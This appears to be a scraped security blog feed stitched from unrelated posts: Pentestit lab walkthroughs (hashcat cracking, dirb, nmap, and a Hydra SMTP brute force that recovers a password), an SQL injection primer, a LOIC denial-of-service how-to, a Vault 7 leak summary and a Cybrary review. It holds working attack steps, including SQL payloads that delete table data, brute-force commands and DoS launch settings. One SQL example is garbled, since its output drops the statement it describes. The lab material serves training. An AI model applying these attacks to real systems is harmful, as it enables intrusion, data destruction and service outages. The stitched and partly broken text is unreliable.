   #	    \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.1 #
   #								 By Zion3R #
   #							www.Blackploit.com #
   #						       Root@Blackploit.com #

 HASH: $1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Possible Hashs:
[+]  MD5(Unix)


root@pentestit:~# hashcat -m 500 -a o lindsey_hash /usr/share/wordlists/rockyou.txt
Initializing hashcat v2.00 with 2 threads and 32mb segment-size...

Skipping line: cat lindsey_hash (signature unmatched)
Added hashes from file lindsey_hash: 1 (1 salts)
Activating quick-digest mode for single-hash with salt

[s]tatus [p]ause [r]esume [b]ypass [q]uit => r
All hashes have been recovered

Input.Mode: Dict (/usr/share/wordlists/rockyou.txt)
Index.....: 1/5 (segment), 3605274 (words), 33550339 (bytes)
Recovered.: 1/1 hashes, 1/1 salts
Speed/sec.: - plains, 20.45k words
Progress..: 166528/3605274 (4.62%)
Running...: 00:00:00:09
Estimated.: 00:00:02:48

Started: Mon Mar 20 07:46:37 2017
Stopped: Mon Mar 20 07:46:46 2017

After some time we see that the MD5 Hash is that of the password lindsey123.

Finding the Site Token:

Since we were able to compromise a username and password, we need to find a place where we can leverage these credentials.

At this point, I decide to run dirb to try and enumerate any interesting directories that I might have missed.

root@pentestit:~# dirb

DIRB v2.22 
By The Dark Raver

START_TIME: Mon Mar 20 07:50:58 2017
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:7343) 
---- Entering directory: ----
+ (CODE:302|SIZE:0) 
---- Entering directory: ----
---- Entering directory: ----
---- Entering directory: ----

---- Entering directory: ----

---- Entering directory: ----
---- Entering directory: ----
END_TIME: Mon Mar 20 08:00:01 2017

The admin console looks promising! So let’s go ahead and log in there! site login and token


Once logged in, you should automatically see the Site Token on the main page.

Token (2/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the Blog to get the token!

Site  Token complete.PNG

You learn by practical work, so go through this walkthrough, and the lab – and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (3/13) – The SSH Token!

All that is SQL Injection

Introducing SQL Injection

SQL injection has been around for at least 20 years, but it is no less powerful or dangerous than any other attack we have covered so far. It is designed to exploit flaws in a website or web application. The attack works by inserting code into an existing line of code prior to its being executed by a database. If SQL injection is successful, attackers can cause their own code to run. In the real world this attack has proven dangerous because many developers are either not aware of the threat or don’t understand its seriousness. Developers should be aware that:

  • SQL injection is typically a result of flaws in the web application or website and is not an issue with the database.
  • SQL injection is at the source of many of the high-level or well-known attacks on the Internet.
  • The goal of attacks of this type is to submit commands through a web application to a database in order to retrieve or manipulate data. • The usual cause of this type of flaw is improper or absent input validation, thus allowing code to pass unimpeded to the database without being verified.


SQL Attacks in Action

In 2011, Sony Corporation was the victim of a SQL injection that compromised a multitude of accounts (estimated to be over one million e-mails, usernames, and passwords). The FBI revealed that a minimum of 100,000 records, including Social Security numbers of current and former federal employees, were compromised. Additionally, 2,800 of the records obtained included bank account numbers. When investigating this attack, the FBI revealed that not only the DoE and the Army were impacted; NASA, the U.S. Missile Defense Agency, and the Environmental Protection Agency were also affected. Details of these attacks have not been fully released as of this writing. SQL injection is achieved through the insertion of characters into existing SQL commands with the intention of altering the intended behavior. The following example illustrates SQL injection in action and how it is carried out. The example also reveals the impact of altering the existing values and structure of a SQL query.

In the following example, an attacker with the username link inputs for the original code after the = sign in WHERE owner which used to include the string ‘name’; DELETE FROM items; — for itemName into an existing SQL command, and the query becomes the following two queries:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
DELETE FROM items;--

Many of the common database products such as Microsoft’s SQL Server and Oracle’s Siebel allow several SQL statements separated by semicolons to be executed at once. This technique, known as batch execution, allows an attacker to execute multiple arbitrary commands against a database. In other databases, this technique will generate an error and fail, so knowing the database you are attacking is essential.

If an attacker enters the string ‘name’; DELETE FROM items; SELECT * FROM items WHERE ‘a’ = ‘a’, the following three valid statements will be created:

SELECT * FROM items 
WHERE owner = 'link' 
AND itemname = 'name'; 
SELECT * FROM items WHERE 'a' = 'a';

A good way to prevent SQL injection attacks is to use input validation, which ensures that only approved characters are accepted. Use whitelists, which dictate safe characters, and blacklists, which dictate unsafe characters.

Results of SQL Injection

What can be accomplished as a result of a SQL injection attack? Well, there are a huge number of possibilities, which are limited only by the configuration of the system and the skill of the attacker.

If an attack is successful, a host of problems could result. Consider the following a sample of the potential outcomes:

  • Identity spoofing through manipulating databases to insert bogus or misleading information such as e-mails and contact information.
  • Alteration of prices in e-commerce applications. In this attack, the intruder once again alters data, but does so with the intention of changing price information in order to purchase products or services at a reduced rate.
  • Alteration of data or outright replacement of data in existing databases with information created by the attacker.
  • Escalation of privileges to increase the level of access an attacker has to the system, up to and including full administrative access to the operating system.
  • Denial of service, performed by flooding the server with requests designed to overwhelm the system.
  • Data extraction and disclosure of all data on the system through the manipulation of the database.
  • Destruction or corruption of data through rewriting, altering, or other means.
  • Eliminating or altering transactions that have been or will be committed


Next up will be all about the anatomy of a SQL Injection and Database vulnerabilities.

LOIC (Low Orbit Ion Cannon) – DOS attacking tool

Low Orbit Ion Cannon (LOIC) is one the easiest DDoS tools available, yet its simplicity and remote connection features make it an extremely effective tool. In this guide I will show you just how easy it is to launch a DoS attack using LOIC. For this exercise I used a Windows Server 2008 client with LOIC installed and a Windows 7 target with Wireshark for traffic capture.

1. First, we run the LOIC.exe file. Do not perform an in-depth installation; just run the executable.

2. Once you run the EXE, the program pops up and is ready for a quick configuration. Note that you can target a URL as well as a specific IP address. For our purposes just enter the IP of your Windows 7 box.

Low Orbit Ion Cannon

3. Click the Lock On button. The IP address shows up as the target; there is no doubt where this traffic is going.

LOIC - Low Orbit Ion Cannon setup

4. Now that you have the IP input and target selected, you can configure a few more details for your attack preferences. For this exercise use port 80, the TCP method, 10000 threads, and the default TCP/UDP message, as shown here:

5. Before you hit the fire button, hop back over to your Windows 7 system and start Wireshark to see the traffic generated by LOIC.

6. Now you can fire your LOIC beam and view the traffic.

LOIC - traffic

Vault 7: CIA Hacking Tools – Analysis

CIA malware targets iPhone, Android, smart TVs

CIA malware and hacking tools are built by EDG (Engineering Development Group), a software development group within CCI (Center for Cyber Intelligence), a department belonging to the CIA’s DDI (Directorate for Digital Innovation). The DDI is one of the five major directorates of the CIA (see this organizational chart of the CIA for more details).

The EDG is responsible for the development, testing and operational support of all backdoors, exploits, malicious payloads, trojans, viruses and any other kind of malware used by the CIA in its covert operations world-wide.

The increasing sophistication of surveillance techniques has drawn comparisons with George Orwell’s 1984, but “Weeping Angel”, developed by the CIA’s Embedded Devices Branch (EDB), which infests smart TVs, transforming them into covert microphones, is surely its most emblematic realization.

The attack against Samsung smart TVs was developed in cooperation with the United Kingdom’s MI5/BTSS. After infestation, Weeping Angel places the target TV in a ‘Fake-Off’ mode, so that the owner falsely believes the TV is off when it is on. In ‘Fake-Off’ mode the TV operates as a bug, recording conversations in the room and sending them over the Internet to a covert CIA server.

As of October 2014 the CIA was also looking at infecting the vehicle control systems used by modern cars and trucks. The purpose of such control is not specified, but it would permit the CIA to engage in nearly undetectable assassinations.

The CIA’s Mobile Devices Branch (MDB) developed numerous attacks to remotely hack and control popular smart phones. Infected phones can be instructed to send the CIA the user’s geolocation, audio and text communications as well as covertly activate the phone’s camera and microphone.

Despite iPhone’s minority share (14.5%) of the global smart phone market in 2016, a specialized unit in the CIA’s Mobile Development Branch produces malware to infest, control and exfiltrate data from iPhones and other Apple products running iOS, such as iPads. CIA’s arsenal includes numerous local and remote “zero days” developed by CIA or obtained from GCHQ, NSA, FBI or purchased from cyber arms contractors such as Baitshop. The disproportionate focus on iOS may be explained by the popularity of the iPhone among social, political, diplomatic and business elites.

A similar unit targets Google’s Android which is used to run the majority of the world’s smart phones (~85%) including Samsung, HTC and Sony. 1.15 billion Android powered phones were sold last year. “Year Zero” shows that as of 2016 the CIA had 24 “weaponized” Android “zero days” which it has developed itself and obtained from GCHQ, NSA and cyber arms contractors.

These techniques permit the CIA to bypass the encryption of WhatsApp, Signal, Telegram, Wiebo, Confide and Cloackman by hacking the “smart” phones that they run on and collecting audio and message traffic before encryption is applied.


CIA malware targets Windows, OSx, Linux, routers

The CIA also runs a very substantial effort to infect and control Microsoft Windows users with its malware. This includes multiple local and remote weaponized “zero days”, air gap jumping viruses such as “Hammer Drill” which infects software distributed on CD/DVDs, infectors for removable media such as USBs, systems to hide data in images or in covert disk areas ( “Brutal Kangaroo”) and to keep its malware infestations going.

Many of these infection efforts are pulled together by the CIA’s Automated Implant Branch (AIB), which has developed several attack systems for automated infestation and control of CIA malware, such as “Assassin” and “Medusa”.

Attacks against Internet infrastructure and webservers are developed by the CIA’s Network Devices Branch (NDB).

The CIA has developed automated multi-platform malware attack and control systems covering Windows, Mac OS X, Solaris, Linux and more, such as EDB’s “HIVE” and the related “Cutthroat” and “Swindle” tools, which are described in the examples section below.


CIA ‘hoarded’ vulnerabilities (“zero days”)

In the wake of Edward Snowden’s leaks about the NSA, the U.S. technology industry secured a commitment from the Obama administration that the executive would disclose on an ongoing basis — rather than hoard — serious vulnerabilities, exploits, bugs or “zero days” to Apple, Google, Microsoft, and other US-based manufacturers.

Serious vulnerabilities not disclosed to the manufacturers places huge swathes of the population and critical infrastructure at risk to foreign intelligence or cyber criminals who independently discover or hear rumors of the vulnerability. If the CIA can discover such vulnerabilities so can others.

The U.S. government’s commitment to the Vulnerabilities Equities Process came after significant lobbying by US technology companies, who risk losing their share of the global market over real and perceived hidden vulnerabilities. The government stated that it would disclose all pervasive vulnerabilities discovered after 2010 on an ongoing basis.

“Year Zero” documents show that the CIA breached the Obama administration’s commitments. Many of the vulnerabilities used in the CIA’s cyber arsenal are pervasive and some may already have been found by rival intelligence agencies or cyber criminals.

As an example, specific CIA malware revealed in “Year Zero” is able to penetrate, infest and control both the Android phone and iPhone software that runs or has run presidential Twitter accounts. The CIA attacks this software by using undisclosed security vulnerabilities (“zero days”) possessed by the CIA but if the CIA can hack these phones then so can everyone else who has obtained or discovered the vulnerability. As long as the CIA keeps these vulnerabilities concealed from Apple and Google (who make the phones) they will not be fixed, and the phones will remain hackable.

The same vulnerabilities exist for the population at large, including the U.S. Cabinet, Congress, top CEOs, system administrators, security officers and engineers. By hiding these security flaws from manufacturers like Apple and Google the CIA ensures that it can hack everyone &mdsh; at the expense of leaving everyone hackable.


‘Cyberwar’ programs are a serious proliferation risk

Cyber ‘weapons’ are not possible to keep under effective control.

While nuclear proliferation has been restrained by the enormous costs and visible infrastructure involved in assembling enough fissile material to produce a critical nuclear mass, cyber ‘weapons’, once developed, are very hard to retain.

Cyber ‘weapons’ are in fact just computer programs which can be pirated like any other. Since they are entirely comprised of information they can be copied quickly with no marginal cost.

Securing such ‘weapons’ is particularly difficult since the same people who develop and use them have the skills to exfiltrate copies without leaving traces — sometimes by using the very same ‘weapons’ against the organizations that contain them. There are substantial price incentives for government hackers and consultants to obtain copies since there is a global “vulnerability market” that will pay hundreds of thousands to millions of dollars for copies of such ‘weapons’. Similarly, contractors and companies who obtain such ‘weapons’ sometimes use them for their own purposes, obtaining advantage over their competitors in selling ‘hacking’ services.

Over the last three years the United States intelligence sector, which consists of government agencies such as the CIA and NSA and their contractors, such as Booz Allan Hamilton, has been subject to unprecedented series of data exfiltrations by its own workers.

A number of intelligence community members not yet publicly named have been arrested or subject to federal criminal investigations in separate incidents.

Most visibly, on February 8, 2017 a U.S. federal grand jury indicted Harold T. Martin III with 20 counts of mishandling classified information. The Department of Justice alleged that it seized some 50,000 gigabytes of information from Harold T. Martin III that he had obtained from classified programs at NSA and CIA, including the source code for numerous hacking tools.

Once a single cyber ‘weapon’ is ‘loose’ it can spread around the world in seconds, to be used by peer states, cyber mafia and teenage hackers alike.


U.S. Consulate in Frankfurt is a covert CIA hacker base

In addition to its operations in Langley, Virginia the CIA also uses the U.S. consulate in Frankfurt as a covert base for its hackers covering Europe, the Middle East and Africa.

CIA hackers operating out of the Frankfurt consulate ( “Center for Cyber Intelligence Europe” or CCIE) are given diplomatic (“black”) passports and State Department cover. The instructions for incoming CIA hackers make Germany’s counter-intelligence efforts appear inconsequential: “Breeze through German Customs because you have your cover-for-action story down pat, and all they did was stamp your passport”

Your Cover Story (for this trip)
Q: Why are you here?
A: Supporting technical consultations at the Consulate.

Two earlier WikiLeaks publications give further detail on CIA approaches to customs and secondary screening procedures.

Once in Frankfurt CIA hackers can travel without further border checks to the 25 European countries that are part of the Shengen open border area — including France, Italy and Switzerland.

A number of the CIA’s electronic attack methods are designed for physical proximity. These attack methods are able to penetrate high security networks that are disconnected from the internet, such as police record database. In these cases, a CIA officer, agent or allied intelligence officer acting under instructions, physically infiltrates the targeted workplace. The attacker is provided with a USB containing malware developed for the CIA for this purpose, which is inserted into the targeted computer. The attacker then infects and exfiltrates data to removable media. For example, the CIA attack system Fine Dining, provides 24 decoy applications for CIA spies to use. To witnesses, the spy appears to be running a program showing videos (e.g VLC), presenting slides (Prezi), playing a computer game (Breakout2, 2048) or even running a fake virus scanner (Kaspersky, McAfee, Sophos). But while the decoy application is on the screen, the underlaying system is automatically infected and ransacked.


How the CIA dramatically increased proliferation risks

In what is surely one of the most astounding intelligence own goals in living memory, the CIA structured its classification regime such that for the most market valuable part of “Vault 7” — the CIA’s weaponized malware (implants + zero days), Listening Posts (LP), and Command and Control (C2) systems — the agency has little legal recourse.

The CIA made these systems unclassified.

Why the CIA chose to make its cyberarsenal unclassified reveals how concepts developed for military use do not easily crossover to the ‘battlefield’ of cyber ‘war’.

To attack its targets, the CIA usually requires that its implants communicate with their control programs over the internet. If CIA implants, Command & Control and Listening Post software were classified, then CIA officers could be prosecuted or dismissed for violating rules that prohibit placing classified information onto the Internet. Consequently the CIA has secretly made most of its cyber spying/war code unclassified. The U.S. government is not able to assert copyright either, due to restrictions in the U.S. Constitution. This means that cyber ‘arms’ manufactures and computer hackers can freely “pirate” these ‘weapons’ if they are obtained. The CIA has primarily had to rely on obfuscation to protect its malware secrets.

Conventional weapons such as missiles may be fired at the enemy (i.e into an unsecured area). Proximity to or impact with the target detonates the ordnance including its classified parts. Hence military personnel do not violate classification rules by firing ordnance with classified parts. Ordnance will likely explode. If it does not, that is not the operator’s intent.

Over the last decade U.S. hacking operations have been increasingly dressed up in military jargon to tap into Department of Defense funding streams. For instance, attempted “malware injections” (commercial jargon) or “implant drops” (NSA jargon) are being called “fires” as if a weapon was being fired. However the analogy is questionable.

Unlike bullets, bombs or missiles, most CIA malware is designed to live for days or even years after it has reached its ‘target’. CIA malware does not “explode on impact” but rather permanently infests its target. In order to infect target’s device, copies of the malware must be placed on the target’s devices, giving physical possession of the malware to the target. To exfiltrate data back to the CIA or to await further instructions the malware must communicate with CIA Command & Control (C2) systems placed on internet connected servers. But such servers are typically not approved to hold classified information, so CIA command and control systems are also made unclassified.

A successful ‘attack’ on a target’s computer system is more like a series of complex stock maneuvers in a hostile take-over bid or the careful planting of rumors in order to gain control over an organization’s leadership rather than the firing of a weapons system. If there is a military analogy to be made, the infestation of a target is perhaps akin to the execution of a whole series of military maneuvers against the target’s territory including observation, infiltration, occupation and exploitation.


Evading forensics and anti-virus

A series of standards lay out CIA malware infestation patterns which are likely to assist forensic crime scene investigators as well as Apple, Microsoft, Google, Samsung, Nokia, Blackberry, Siemens and anti-virus companies attribute and defend against attacks.

“Tradecraft DO’s and DON’Ts” contains CIA rules on how its malware should be written to avoid fingerprints implicating the “CIA, US government, or its witting partner companies” in “forensic review”. Similar secret standards cover the use of encryption to hide CIA hacker and malware communication(pdf), describing targets & exfiltrated data (pdf) as well as executing payloads (pdf) and persisting (pdf) in the target’s machines over time.

CIA hackers developed successful attacks against most well known anti-virus programs. These are documented in AV defeats, Personal Security Products, Detecting and defeating PSPs andPSP/Debugger/RE Avoidance. For example, Comodo was defeated by CIA malware placing itself in the Window’s “Recycle Bin”. While Comodo 6.x has a “Gaping Hole of DOOM”.

CIA hackers discussed what the NSA’s “Equation Group” hackers did wrong and how the CIA’s malware makers could avoid similar exposure.


Pentestit Lab v10 – The Mail Token

In my previous post “Pentestit Lab v10 – Introduction & Layout”, I covered the Network layout and VPN Connection. Today I will be covering the first steps taken to attack the lab – which will include the following:

  • Fingerprinting the GW machine
  • Carrying out Intelligence Gathering
  • Brute Forcing SMTP
  • Finding the Mail Token

There are 13 Tokens in total scattered throughout the lab (Network). Each of the posts are in order of compromise which provided the best results and were the most logical. I closely followed the The Penetration Testing Execution Standard which aided me in compromising the next system or device from previously gained information.

What does this mean? This means that I started by enumerating users, gaining emails, passwords, and any other network information that seemed useful to me. With this information I was able to log into other devices, leverage exploits or logins further in the process, this also allowed me to easily pivot from machine to machine and gain deeper access to the network – to where I was finally able to take control of the Domain Controller.

If you are completely unfamiliar with how a “Grey Box” Penetration Test is carried out on a Network – along with the exploitation of Web Applications, daemons and services – then I highly suggest you get ahold of and read the following resources – as well as read the PTES Standards that I linked above.

As with anything, if you have any comments, questions, or general concerns/issues/suggestions about my techniques – please leave a comment below!

Fingerprinting the GW Machine:

Consult the Network Map if you forgot what or where the GW Machine is. Since it’s the only Server sitting between us (possibly in the DMZ) and the internal network, we have to compromise it first to gain access to the internal network.

Since we already have VPN access to the lab – we can start by fingerprinting the gw machine (also called Active Footprinting in the PTES).

We can do so by running Nmap as a SYN Stealth Scan with the -sS option, as well as running the -A option for OS detection, version detection, script scanning, and traceroute. I also used the -n option to disable DNS Resolution.

If you are unfamiliar with the Nmap scan options, or need a quick refresher – then I suggest you read the Nmap Options Summary.

eb7u6 (protocol 2.0)
| ssh-hostkey: 
|   1024 bd:04:9b:d8:8d:0e:5b:e3:11:a7:57:18:c0:ce:9f:83 (DSA)
|   2048 98:e6:d0:35:6d:11:c4:d1:fb:7c:0f:87:c6:b6:8e:da (RSA)
|_  256 2c:58:fd:06:ea:46:8e:f7:b5:28:58:58:06:fa:dc:38 (ECDSA)
25/tcp   open  smtp    CommuniGate Pro mail server 6.0.9
|_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection timeout
80/tcp   open  http    nginx 1.10.1
|_http-server-header: nginx/1.10.1
|_http-title: 403 Forbidden
443/tcp  open  http    nginx 1.2.1
|_http-server-header: nginx/1.2.1
|_http-title: Security Blog by GlobalDataSecurity
8100/tcp open  http    CommuniGate Pro httpd 6.0.9
| http-methods: 
|_http-server-header: CommuniGatePro/6.0.9
|_http-svn-info: ERROR: Script execution failed (use -d to debug)
|_http-title:  CommuniGate Pro gds.lab Entrance
| http-webdav-scan: 
|   Server Type: CommuniGatePro/6.0.9
|   Server Date: Tue, 24 Jan 2017 23:31:59 GMT
|   WebDAV type: Unkown
|   Directory Listing: 
|     /
|     /CalDAV/
|     /CalDAV/INBOX/
|     /CalDAV/Outbox/
|     /WebDAV/private/caldav/
|_    /CalDAV/Notify/
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall|broadband router|media device
Running (JUST GUESSING): Linux 3.X|2.6.X (91%), WatchGuard Fireware 11.X (91%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:watchguard:fireware:11.8 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3.x
Aggressive OS guesses: Linux 3.2 - 3.8 (91%), Linux 3.8 (91%), WatchGuard Fireware 11.8 (91%), Linux 3.1 - 3.2 (91%), Linux 3.2.0 (90%), Linux 3.0 - 3.2 (88%), Linux 3.5 (88%), Linux 2.6.32 - 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 2.6.39 (86%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 3 hops
Service Info: Host: gds.lab; OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 25/tcp)
1   117.65 ms
2   117.82 ms
3   118.93 ms

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.62 seconds

Our initial review of the Nmap scans reveals that the following ports are open:

  • TCP/22 – SSH
  • TCP/25 – SMTP (CommuniGate Pro)
  • TCP/80 – nginx (HTTP)
  • TCP/443 – nginx (HTTPS)
  • TCP/8100 – CommuniGate Pro (HTTPD) – Email Server

In a logical fashion, we can’t attack SSH since we don’t have any credentials. SMTP we can use to enumerate users… but that could be tedious if we don’t know how/what the structure of login names are. I can try accessing CommuniGate Pro with an exploit… but version 6.0.9 at the time of writing this was exploit free.

The best bet – and most logical step – would be to explore TCP/80 and TCP/443 and see what the website holds for us. Maybe there are vulnerabilities, comments in the source code, account details, etc.

Intelligence Gathering:

Before I  can continue to the website – just a quick tip of advice – add the following to your /etc/hosts file so you don’t encounter any issues when accessing the website.

root@kali:~# nano /etc/hosts       localhost       kali   store.gds.lab

# The following lines are desirable for IPv6 capable hosts
::1     localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters

Once having added store.gds.lab to the hosts file,  navigate to the IP of and check out the website. Global Data Security – Global Data Security

It seems that the website is that of a Global Data Security company selling Security Software… uhmmmm this is going to be fun!

Quickly digging through the website and its associated links really didn’t provide me with anything valuable. So I decided to move on and try TCP/443. 443 - Security Blog 443 – Security Blog

This is rather interesting! By the looks of it, I think I stumbled on the Blog of Global Data Security. Maybe we can find some account details such as usernames perhaps?

A quick look at the source code for the main page revealed the following:

<!DOCTYPE html>
<html lang="en">


    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="description" content="">
    <meta name="author" content="">

    <title>Security Blog by GlobalDataSecurity</title>

    <!-- Bootstrap Core CSS -->
    <link href="vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

    <!-- Theme CSS -->
    <!-- Alfred Modlin said use this template -->
    <link href="css/clean-blog.min.css" rel="stylesheet">

    <!-- Custom Fonts -->
    <link href="vendor/font-awesome/css/font-awesome.min.css" rel="stylesheet" type="text/css">
    <link href='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
    <link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->
    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->
    <!--[if lt IE 9]>


Notice the comment?<!-- Alfred Modlin said use this template --> It seems like we got a possible username. Let’s save this for later in case we need it.

I notice that there is a “Contact Us” section on the blog as well, let’s go dig around there! 443 - Security Blog Contact Details 443 – Security Blog Contact Details

Well, well what do we have here? Emails! This is great! We now know how the usernames are structured for Global Data Security. So Alfred Modlin should be


Let’s add those usernames to a list for safe keeping.

root@kali:~# nano names
root@kali:~# cat names 

Brute Forcing SMTP:

Since we got those three usernames, and there’s an active E-Mail server on the site – let’s try and Brute Force some passwords through SMTP!

I decided to use THC Hydra for this as well as the Rockyou Password List.

root@kali:~# hydra -L names -P /usr/share/wordlists/rockyou.txt smtp
Hydra v8.3 (c) 2016 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2017-03-17 17:47:43
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 16 tasks per 1 server, overall 64 tasks, 43033197 login tries (l:3/p:14344399), ~42024 tries per task
[DATA] attacking service smtp on port 25
[STATUS] 221.00 tries/min, 221 tries in 00:01h, 43032976 to do in 3245:20h, 16 active
[STATUS] 215.67 tries/min, 647 tries in 00:03h, 43032550 to do in 3325:33h, 16 active
[STATUS] 215.57 tries/min, 1509 tries in 00:07h, 43031688 to do in 3326:57h, 16 active
[STATUS] 191.07 tries/min, 2866 tries in 00:15h, 43030460 to do in 3753:32h, 16 active
[25][smtp] host:   login: a.modlin@gds.lab   password: justdoit

Nice! We got a password for a.modlin! And since we got that… let’s snoop around his emails, shall we?

Finding the Mail Token:

We can access the CommuniGate Pro Email service on TCP/8100. 8100 - login screen 8100 – login screen

Once there, let’s login with a.modlin:justdoit and see if we have access. - a.mondil email – a.mondil email


Bingo! We see that Alfred has two emails, one with the Token, and another one with some kind of App.

Taking a look and see what the app is, it might be useful. a.mondil MAIL - app a.mondil MAIL – app


From the email we initially have some extra information about the network. We now know that there is only one SSH Port at and that the app will allow us to see if (The .apk is attached).

I believe we will need it for later exploitation purposes, so let’s save that!

Token (1/13):

We found the token! Go ahead and submit it on the main page to gain points for it!

I didn’t post the actual token. Because, what would be the fun in that if I did? Go through and actually try to compromise the SMTP Service to get the token!

Mail Token complete.PNG

You learn by practical work, so go through this walkthrough, and the lab – and learn something new!

That’s all for now, stay tuned for the next post to compromise the next Token (2/13) – The Site Token!


Cybrary.it – The Review

In the IT world, there seems to be always a need for certified and/or experienced IT professionals. Cybrary.it is an online resource dedicated to helping people who are interested in this field get the training they need to start or grow their expertise in the IT industry.

All training courses are completely FREE. The site runs off of donations (both financially and through materials) from users and partners/sponsors.

I have personally used cybrary.it and intend to continue. I wouldn’t say it is the one-stop learning location for all IT certifications but it gets very close. The courses offered from basic Comptia A+ to CISSP and advanced hacking, are all well in depth and follow the structure of exam criteria.

I also have completed the PCI/DSS, A+, ITIL Foundation  courses and parts of other courses. In my opnion the PCI/DSS course was probably the least extensive one that I have come across during my use (and I’ve been involved with cybrary.it for over a year at this point). Even so, I’d call it a good primer as it exposes the watcher to the basics of the PCI fundamentals, gives a crash course in many of the most used policies, as well as speaks on using Risk management and information security. …and all of this is for FREE. In addition, members of the Cybrary have been writing articles that go into additional topics that are accessible to any registered cybrary.it user.

Registration is free just like the course material and the setup includes creating your own profile. Cybrary.it isn’t just a learning source, but its a community and I’ve seen it grow from just courses and a forum to include hours of reading content submitted by users and companies, a job board, current IT developments, micro certifications and more.

There is much more I could comment on but I don’t want to make this review too lengthy. Perhaps I’ll do another later on a specific element of the site. Regardless of what I choose to do, I know I’ll continue to use cybrary.it extensively for my training needs. I am currently eyeing out Security+ and CCNA.

I challenge you to take a look. There is much more material and training for the IT industry needs there than I could list here in a compact form. So take a look! I’m sure you’ll find something useful.